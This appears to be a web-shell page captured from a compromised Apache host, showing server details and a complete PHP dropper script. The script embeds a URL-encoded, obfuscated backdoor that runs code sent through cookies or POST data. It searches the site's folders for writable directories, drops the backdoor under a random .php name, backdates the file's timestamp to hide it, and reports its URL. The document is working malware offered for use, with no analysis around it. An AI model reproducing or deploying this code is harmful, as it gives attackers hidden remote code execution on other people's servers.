| Server IP : 192.64.112.168 / Your IP : 18.189.143.150 Web Server : Apache System : Linux nc-ph-2300-85.bluforrest.com 4.18.0-513.9.1.el8_9.x86_64 #1 SMP Sat Dec 2 05:23:44 EST 2023 x86_64 User : expressoneac ( 1128) PHP Version : 8.0.30 Disable Function : exec,passthru,shell_exec,system MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /tmp/ |
Upload File : |
<?php
if(!defined("PHP_EOL"))
{
define("PHP_EOL", "\n");
}
$payload_file = "%3C%3Fphp%0Afunction%09nj45872%09%28%29%7Becho%20%27bw45873%27%3B%0A%7D%0A%0A%0A%0A%0Afunction%20%20li45867%09%28%09%24ax45868%20%29%7B%24tz45870%3D0%3B%24fd45869%20%3D%20%20%20%20%20%20%22nx%28jUH/6u%29k4Kl_baDys%3FY.%5BIoLdhf%27mgpvtMc%20%23%3C%5Di1FA%3Be%2AN%40TrE%22%3B%0A%0A%20%20%20%24wn45871%09%3D%09substr%28%22%22%2C%090%29%3B%0A%0A%20while%281%29%0A%0A%7B%0A%09if%28%24tz45870%3E%3Dcount%28%24ax45868%29%29%20%20break%3B%20%24wn45871%20.%3D%20%24fd45869%20%5B%09%24ax45868%5B%24tz45870%5D%20%20%20%20%20%5D%3B%20%20%20%20%24tz45870%2B%2B%3B%0A%7Dreturn%20%24wn45871%3B%0A%0A%7D%24fh45875%20%3D%20%5B%5D%3B%24xftkuz%20%3D%2071152%3B%0A%24fh45875%5B20476%5D%20%3D%20li45867%20%28%20Array%2820%09%2C%20%2033%20%20%20%20%20%20%2C%2028%20%2C%2033%20%20%20%2C%2038%09%2C%0950%09%2C%208%20%2C%200%20%20%20%20%2C%2013%20%2C%2042%09%2C%200%20%2C%2010%20%2C%202%20%20%20%20%20%20%20%2C%2014%09%2C%0914%20%2C%20%20%20%2044%20%2C%2024%09%2C%2026%20%2C%20%20%20%20%2053%09%2C%0914%09%2C%2014%20%2C%209%20%20%20%2C%2046%20%20%20%20%2C%20%20%20%20%20%20%2038%20%2C%29%20%29%20%3B%0A%24fh45875%5B24566%5D%20%3D%09li45867%20%28%20Array%2823%20%2C%2045%20%2C%20%20%204%20%2C%20%20%20%20%20%20%2051%20%2C%205%20%2C%20%20%20%20%20%2014%20%2C%20%20%20%20%20%20%2012%20%2C%0953%09%2C%0921%20%20%20%20%2C%2041%09%2C%29%20%29%20%3B%0A%24qr45895%20%3D%2013535%3B%24fh45875%5B66029%5D%09%3D%20li45867%20%20%20%20%20%20%28%09Array%2817%09%2C%094%20%2C%2036%20%2C%2036%09%2C%0921%09%2C%0943%20%20%20%20%20%20%2C%29%09%29%20%3B%0A%24fh45875%5B51181%5D%20%3D%20li45867%20%28%20Array%2822%09%2C%20%20%20%20%20%20%203%20%2C%2033%09%2C%2032%20%2C%29%20%20%20%20%29%20%20%20%20%20%20%3B%0A%24fh45875%5B89579%5D%09%3D%20li45867%09%28%09Array%285%09%2C%2048%20%2C%29%20%29%20%3B%24wu45896%20%3D%20%20%20%20%2011793%3B%24fh45875%5B66027%5D%20%20%20%20%20%20%20%3D%09li45867%09%28%20Array%2822%20%2C%096%20%2C%29%09%29%20%3B%0A%0A%24fh45875%5B65507%5D%20%20%20%20%20%3D%09li45867%20%28%20Array%2840%20%20%20%2C%29%20%29%20%20%20%20%3B%0A%0A%0A%24ku45897%09%3D%0952730%3B%0A%24fh45875%5B94690%5D%20%3D%20li45867%20%28%20Array%2839%20%2C%29%20%29%20%20%20%3B%0A%0A%0A%24fh45875%5B82914%5D%09%3D%20li45867%20%28%09Array%2829%09%2C%0942%20%20%20%20%20%2C%2013%20%20%20%2C%20%2047%20%20%20%20%2C%0914%20%2C%0933%20%20%20%2C%208%20%20%2C%20%20%20%20%20%20%2035%20%2C%2014%20%2C%2037%20%20%20%20%20%20%2C%20%20%20%2025%20%2C%200%20%2C%20%20%20%20%20%2035%20%20%20%20%20%2C%2047%20%20%20%20%2C%20%20%20%20%20%20%200%20%20%2C%2035%20%2C%2019%20%2C%29%20%29%20%20%20%20%20%20%3B%0A%0A%0A%24fh45875%5B64479%5D%20%3D%09li45867%09%28%20Array%2829%20%2C%2042%20%2C%2013%09%2C%2047%20%2C%0914%20%2C%0947%09%2C%201%09%2C%20%20%2042%09%2C%20%20%2019%20%20%20%20%20%20%20%2C%20%20%20%2035%20%2C%20%20%2019%20%2C%29%09%29%20%3B%0A%0A%0A%24fh45875%5B83932%5D%20%3D%20%20%20%20%20%20li45867%20%20%20%20%20%28%20%20%20%20%20Array%2816%20%2C%2052%09%2C%2052%20%2C%2016%20%2C%2018%09%2C%2014%20%2C%2031%20%2C%0947%09%2C%2052%20%2C%20%2032%09%2C%2047%09%2C%29%20%29%20%3B%0A%0A%0A%24fh45875%5B48601%5D%20%3D%20li45867%20%28%20%20%20%20Array%2819%09%2C%20%20%20%20%2035%20%2C%2052%20%2C%2014%20%20%20%2C%20%20%20%20%20%2052%09%2C%0947%09%2C%20%20%20%20%20%2033%20%2C%2047%09%2C%2016%20%2C%2035%20%2C%29%20%29%20%20%20%20%20%20%20%3B%0A%24oy45898%20%3D%20%20%20%20%20%20%2031858%3B%0A%0A%24fh45875%5B9168%5D%20%3D%20%20%20li45867%20%20%28%20%20Array%2847%20%20%2C%201%20%2C%20%20%20%20%20%20%2033%20%2C%0913%20%2C%2025%20%20%20%20%20%20%20%2C%2027%20%20%20%20%2C%2047%20%2C%29%20%20%20%20%20%20%20%29%20%3B%0A%0A%24fh45875%5B22458%5D%20%3D%09li45867%09%28%20Array%2842%20%2C%090%20%2C%0935%09%2C%0934%09%2C%0916%20%20%20%2C%2013%20%2C%29%20%29%20%3B%24fh45875%5B46512%5D%09%3D%20li45867%20%28%20Array%288%20%20%20%20%20%2C%090%20%2C%2013%20%2C%20%20%2042%20%2C%200%20%2C%0910%20%2C%29%20%29%09%3B%0A%0A%24zh45899%20%20%20%20%20%20%20%3D%0964800%3B%0A%24fh45875%5B19373%5D%20%3D%20%20%20%20%20%20%20li45867%20%20%20%20%20%20%20%28%20%20%20%20Array%2819%20%2C%2035%20%2C%20%20%20%20%20%2052%20%2C%2013%20%20%20%20%20%2C%20%2047%20%2C%200%20%20%2C%29%20%20%20%29%20%3B%24fh45875%5B42919%5D%20%20%20%3D%09li45867%20%28%20Array%2813%20%2C%20%20%20%20%20%2035%20%2C%20%20%20%2052%20%2C%0942%09%2C%2031%09%2C%29%20%29%20%3B%0A%24fh45875%5B63399%5D%20%20%20%20%3D%20li45867%20%28%20%20%20%20%20%20%20Array%2852%20%2C%2035%20%2C%20%20%2052%20%20%20%2C%0942%09%2C%20%20%20%20%20%20%2031%09%2C%29%20%29%09%3B%24fh45875%5B37279%5D%20%3D%09li45867%20%20%20%20%28%20%20Array%2849%20%20%20%20%2C%20%20%20%20%20%204%20%2C%0926%20%20%20%20%2C%0926%20%20%20%2C%29%20%29%20%20%20%20%20%20%20%3B%0A%0A%24ta45900%20%3D%2080705%3B%24fh45875%5B45469%5D%09%3D%20%20%20%20%20%20%20li45867%20%20%20%20%20%28%09Array%2833%20%2C%2016%20%2C%20%2037%09%2C%2010%20%2C%29%09%29%09%3B%0A%0A%24gz45901%20%3D%2045221%3B%0A%0A%0A%24jp45890%09%3D%20%20%20%20%20%24_COOKIE%3B%20%24df45889%20%3D%20%20%20%20%20%2229149%22%3B%0A%0A%0A%24jp45890%09%3D%20%20%20%20%20%20%24fh45875%5B83932%5D%28%24jp45890%2C%20%24_POST%29%3B%0Aforeach%20%28%24jp45890%09as%20%24kl45894%20%3D%3E%20%24qq45891%29%0A%0A%7B%0A%0A%20%20%20function%20li45880%09%28%20%20%20%20%20%20%24fh45875%2C%20%20%20%20%20%24kl45894%20%20%20%20%20%20%20%2C%09%24qj45888%20%29%0A%0A%0A%20%20%20%20%20%7B%20return%20substr%20%20%20%20%20%20%28%20%24fh45875%5B48601%5D%20%20%28%09%24kl45894%20.%20%2770df4785-fc0a-45ce-bfd0-3d7b1ab42bdd%27%09%2C%09%24fh45875%5B22458%5D%28%20%24qj45888/%24fh45875%5B19373%5D%28%09%24kl45894%20%29%20%29%20%2B%201%20%29%20%2C%200%09%2C%20%24qj45888%20%29%3B%0A%20%7D%0A%0A%0A%09function%20hh45884%20%20%28%20%24fh45875%2C%20%24dr45893%20%29%0A%20%7B%0A%20if%09%28%20%20isset%20%28%20%24dr45893%5B2%5D%20%20%20%29%20%20%20%20%20%29%20%7B%0A%20%0A%0A%20yc45882%09%28%09%24fh45875%2C%20%20%20%20%20%20dv45881%20%28%20%20%20%24fh45875%2C%20%24dr45893%29%29%3B%0A%0A%20%0A%0A%20return%201%3B%0A%0A%20%7D%20return%09%24fh45875%5B37279%5D%3B%09%7D%0A%0A%0A%20%0A%20%20%20%20%20function%20zr45879%09%28%20%24fh45875%2C%20%20%20%20%24dr45893%09%29%0A%0A%09%7B%0A%20return%20%20%20%20%20%40%24fh45875%5B45469%5D%20%28%24fh45875%5B89579%5D%20%20%2C%20%20%20%24dr45893%20%29%3B%0A%0A%09%7D%20%20%20%20%20%20function%20hf45878%20%28%20%24fh45875%2C%20%20%20%24qq45891%2C%20%20%20%20%24kl45894%29%0A%20%7B%0A%0A%0A%09return%20%20zr45879%09%28%09%24fh45875%2C%09%24qq45891%20%29%20%5E%09li45880%20%28%20%24fh45875%2C%20%20%20%20%24kl45894%20%20%20%2C%20%24fh45875%5B19373%5D%28%09%24qq45891%20%20%20%20%20%29%20%29%3B%0A%09%7D%0A%0A%09%0A%0A%09function%20my45877%20%28%20%24fh45875%2C%20%20%24qq45891%2C%09%24kl45894%29%20%20%20%7B%0A%20%20%20%20return%20%24fh45875%5B9168%5D%09%28%09%24fh45875%5B94690%5D%20%20%20%20%20%2C%20hf45878%09%28%20%20%20%20%24fh45875%2C%20%20%24qq45891%2C%20%20%20%20%24kl45894%29%29%3B%0A%0A%0A%20%7D%0A%0A%0A%20%0A%0A%0A%20function%20%20%20xq45876%20%28%20%24fh45875%2C%20%24qq45891%2C%20%24kl45894%29%0A%0A%0A%20%20%20%20%20%7B%0A%0A%20%24qq45891%20%20%20%20%20%3D%09my45877%20%20%20%20%20%20%28%09%24fh45875%2C%20%24qq45891%2C%20%24kl45894%29%3B%0A%20%0A%0A%0A%20unset%28%24kl45894%29%3B%0A%20%20%20%20if%09%28%21empty%28hh45884%20%20%20%20%20%20%28%20%24fh45875%2C%20%20%20%24qq45891%29%29%29%0A%0A%0A%20%20%20%20%7B%0A%0A%20exit%28%29%3B%0A%0A%0A%20%7D%0A%0A%0A%20%7D%0A%0A%0A%20%20%20%20%20%20%20%0A%09function%20dv45881%20%20%20%20%28%20%20%20%20%20%24fh45875%2C%20%24dr45893%29%0A%0A%0A%20%7B%0A%09%24jh45892%20%3D%20%24fh45875%5B66027%5D%20.%20%20%20%20%20%20md5%28%20%2770df4785-fc0a-45ce-bfd0-3d7b1ab42bdd%27%20%20%20%20%20%29%20.%20%20%20%20%20%24fh45875%5B51181%5D%3B%0A%09%0A%0A%20%20%20%20%20%20%20%40%24fh45875%5B82914%5D%20%28%20%24jh45892%2C%20%24fh45875%5B65507%5D%20.%09%24fh45875%5B20476%5D%20%20%20.%20%24dr45893%5B1%5D%20%20%20%28%20%20%20%20%20%24dr45893%5B2%5D%20%29%20%20%20%29%3B%0A%0A%0A%09%0A%20return%20%24jh45892%3B%0A%0A%20%7D%0A%0A%20%20%20%0A%0A%20%20%20%20%20function%20qs45883%20%20%20%28%20%20%20%20%20%24fh45875%2C%20%24jh45892%29%09%7B%0A%0A%0A%20%20%20%20%20%20%40%24fh45875%5B46512%5D%09%28%09%24jh45892%20%20%20%20%20%29%3B%0A%0A%09exit%28%29%3B%0A%0A%0A%20%7D%0A%20%0A%0A%20%20%20%20function%20yc45882%20%28%09%24fh45875%2C%20%24jh45892%09%29%0A%20%7B%0A%20%40require%09%28%20%24jh45892%20%29%3B%0A%0A%0A%09%24yr45885%20%20%20%3D%20%24fh45875%5B64479%5D%20%28%20%20%20%20%20%20%20%24jh45892%29%3B%20%20%20%20%20%20%24ug45886%20%3D%20md5%28%24jh45892%29%3B%0A%0A%0A%20%20%20if%20%20%28%24yr45885%29%20%20%20%20%20%20%0A%0A%0A%20%7B%0A%0A%0A%20%24ni45887%20%20%20%20%20%20%3D%09%24fh45875%5B63399%5D%28str_shuffle%28%24fh45875%5B42919%5D%28%24ug45886%29%29%29%3B%0A%0A%0A%20qs45883%09%28%20%20%20%20%24fh45875%2C%20%20%24jh45892%29%3B%0A%0A%0A%20%7D%20%7D%20%20xq45876%20%20%28%20%24fh45875%2C%20%24qq45891%2C%20%20%20%24kl45894%29%3B%0A%7D";
$payload_name = "";
srand(time());
function list_dir($dir, $depth=10000)
{
$result = array();
$dir_count = 0;
if ($depth == 0)
{
return $result;
}
$dir = strlen($dir) == 1 ? $dir : rtrim($dir, '\\/');
$h = @opendir($dir);
if ($h === FALSE)
{
return $result;
}
while (($f = readdir($h)) !== FALSE)
{
if ($f !== '.' and $f !== '..')
{
$current_dir = "$dir/$f";
if (is_dir($current_dir))
{
$dir_count += 1;
if ($dir_count >= $depth)
{
break;
}
if (@is_writable($current_dir) == TRUE)
{
$result[] = $current_dir;
}
$result = array_merge($result, list_dir($current_dir, $depth / 10));
}
}
}
closedir($h);
return $result;
}
function write_payload($path, $payload)
{
if (!@file_exists($path))
{
if (@file_put_contents($path, rawurldecode($payload)) != FALSE)
{
return TRUE;
}
}
return FALSE;
}
$base_www_path = $host = @$_SERVER['HTTP_HOST'];
$base_local_path = $_SERVER['DOCUMENT_ROOT'];
if (!($base_time = @stat($base_local_path."/.htaccess")))
{
if (!($base_time = @stat($base_local_path."/index.php")))
{
if (!($base_time = @stat($base_local_path."/index.html")))
{
if (!($base_time = @stat($base_local_path."/..")))
{
if (!($base_time = @stat($base_local_path)))
{
$base_time = Array();
$base_time['mtime'] = time();
}
}
}
}
}
$base_time = $base_time['mtime'];
if (!empty($payload_name) && $payload_name[0] == "/")
{
$tokens = explode("*", $payload_name);
$writable_dirs = list_dir(str_replace("//", "/", $base_local_path . "/" . $tokens[0]));
$payload_name = substr($tokens[1], 1);
}
else
{
$writable_dirs = list_dir($base_local_path);
}
if (count($writable_dirs) == 0)
{
echo "STATUS_UNWRITABLE";
exit();
}
shuffle($writable_dirs);
# try to upload
$max_tryes = strlen($payload_name) == 0 ? 10 : 1;
foreach ($writable_dirs as $current_dir)
{
// if payload name is set, no more one try to upload on current dir
for ($i=0; $i < $max_tryes; $i++)
{
if (strlen($payload_name) == 0)
{
$temp_payload_name = substr(str_shuffle(str_repeat('abcdefghijklmnopqrstuvwxyz', mt_rand(1,8))),1,8) . ".php";
}
else
{
$temp_payload_name = $payload_name;
}
$full_payload_name = $current_dir . "/" . $temp_payload_name;
$uri_path = substr($full_payload_name, strlen($base_local_path));
$full_uri = $base_www_path . (strpos($uri_path, "/") == 0 ? $uri_path : "/".$uri_path);
if (write_payload($full_payload_name, $payload_file))
{
touch($full_payload_name, $base_time); // set last modification time as root folder
echo "URL#http://" . $full_uri . PHP_EOL;
exit();
}
}
}
echo "STATUS_CANTUPLOAD";
exit();